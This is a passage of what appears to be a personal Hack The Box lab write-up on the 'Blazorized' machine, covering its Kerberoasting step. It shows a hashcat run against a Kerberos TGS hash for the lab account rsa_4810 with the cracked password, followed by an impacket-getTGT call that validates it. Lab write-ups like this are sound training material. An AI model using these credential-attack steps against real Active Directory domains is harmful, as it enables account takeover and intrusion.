Kerberoasting

While running the adPEAS script, I have discovered that the rsa_4810 account is kerberoast-able

This was confirmed by BloodHound in the later stage that the current user, nu_1055, is has WriteSPN privilege over the rsa_4810

Password Cracking

┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ hashcat -a 0 -m 13100 rsa_4810.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Host memory required for this attack: 1 MB
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
 
$krb5tgs$23$*RSA_4810$blazorized.htb$http:/RSA_4810*$b3afe5d5eb5e5bddb354173d37c530ea$96ab97811e3e5fbadfec2c0a0898a712d1b07cfbeaa395f7676bd4fb47cfc5a60e8831bb5c0bdef5099a06b073f66b8b2001aa699379461b5fd1b67c6a8799babf2a14b5566934bfe64da4a454c896f0c9acf38c2a4fc7e3398432343a8dce224a2adcd431258f531f7e0b7e56f88160f21a6690c0bb836399fdb7c3810e2c79a10fd01beed6aebfeba7fb2804e58756d2070d1bc36e1d6d1e4e7a2bb382ef5a145baadc8589bb15fcb90ec7109704b236a52c3ad1a50fc446ceb8b058f36ab85ec2931782e68e172cf3855e181c9a5f93880387c6525695e56468ff570f5ca7f4356f9c6696d7d9ee4ffb3dc45247a0f029ff56ad100b4ce3e9147f65c88f62eb146ed259946b0c5c912edd6ea35c07cae00374cc9e7a9cfeef6640b06539391f87d3f4cb708a4907879770e19d3602c5eb0a250f3248463847ef45a1ddd5fa570d38ef17c03a27f63c80eb7dd8c4f045ae70b0bdb60fa8bd2279704e6837f898bd7fa3a2cf606490e55d87f8ab1a9cf09075fb1c8cc1ac882bc59ad009eacc66c8e445750f77e72745891dc030e6f2258f8e73c5db5f9037305612ef22bf870c8e8a24197c33f3caadd14a53bf0e0daa536badbbebedded896167769b781dac104f79a6cbf9c100db2149b5d0edefe7d79b4610b011d0d03f79018940b23ccebac1b87836a41f5d693b4c4a6b689ca023a03aa3b238c60b70af49ec1dc284814fbc46809184cdac9107c79747604684003eca125ead9a8ecf40a3903dca484262691656bf8cd2494ef9dbcc52f26ec2b2af7ea03438c9d6798e9e51f7a25ea443fee799c25d1b20d06a61fe9e2506c25798ba51439479feb64a4e1570ae9735cfa40525c1305225a921a5ee6f2d2051d928914abf2b1b38a4e4d77b4693e2db365b01cda0346dd915719f74d183af7a7edad70fd142112b9cbfefaf5eab4f6b191bc775a25f894cddab31451c11bb92d69586d11ef841d5416b1d1a00ecf13a945e8c719bc3ff4ed2028eae9c02e9cf7542f5b076d32a5302fb103676011938d05292d89285618acd85816e902ae98e1dfa150760fc8bb021d89e90a6d1e9afb6852486bfcd5bff307a72d6be5599103a6fd4e4cbe2dcf946f3335dfc56fb510b0ca5916bde1ac0041dd20d1c014b81fd2d0cd0e85f01992c13963c884053a07299caca2459719009dd29a35993ce585b254621bda87629f818ea1c3e885f5d610304d40d2d8453f9e133aaaa0d828b7e059838279142da1e855c37a46f281ebe53385bfb01e866b207cfcf726064ac2f7c1bbe405167ca8fd4bd735a50e1773ccf106d53de904988e50d9688391aeadbe1583b9fa05181a1733c725b21ece44d6a32229480d947c0fcc290ae118b57e8b966baf6f8179eea16474bb3c8a8aa3fca359e01537d9c99934b2e7da4eb906bb7ed581174b872012a819f4a9ba55deedc958c1d852ec13cdb664feaf5bbce775077e54a3e84a1c26bb2766024749bdce5b9f461d889d462d77ac27373c9afbea4abc6a7c349db0c5acf6e5097e7f38e61bb613e77996a10ee10dafd04099202b2531aba0be43079ba51888a5f628d76d6041e966e5b6a74945ff1c23f93df1722cc38626b5abdf0b7007c2cbe485c257b4b123f5d2d1808539bc44a9486b8302fb0dda09f2000fa312c1eed851415cd04d9da03cbc97bc215aec55099e35bcffbe044208f2dead8510adfdcbf003dc2c1bedcea628fc929e19195525c048ef4b33b62dd9722ffc69de1e55d0e7cf5742948068dade02:(Ni7856Do9854Ki05Ng0005 #)
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*RSA_4810$blazorized.htb$http:/RSA_4810...dade02
Time.Started.....: Tue Jul  2 16:35:33 2024 (7 secs)
Time.Estimated...: Tue Jul  2 16:35:40 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2156.1 kH/s (0.84ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 14321664/14344386 (99.84%)
Rejected.........: 0/14321664 (0.00%)
Restore.Point....: 14318592/14344386 (99.82%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: (choupette69) -> ((alexa22))
Hardware.Mon.#1..: Util: 58%
 
Started: Tue Jul  2 16:35:18 2024
Stopped: Tue Jul  2 16:35:41 2024

hashcat cracked the password hash The cracked password for the rsa_4810 account is (Ni7856Do9854Ki05Ng0005 #)

Validation

┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ impacket-getTGT 'BLAZORIZED.HTB/rsa_4810@dc1.blazorized.htb' -k -dc-ip $IP 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Password: (Ni7856Do9854Ki05Ng0005 #)
[*] Saving ticket in rsa_4810@dc1.blazorized.htb.ccache

Validated TGT generated for the rsa_4810 account Since the user is part of the Remote Management Users group, I can just WinRM to the target system

InfoSec LAB

Explorer

Blazorized_Kerberoasting

Kerberoasting

Password Cracking

Validation

Interactive Graph View

Table of Contents

Backlinks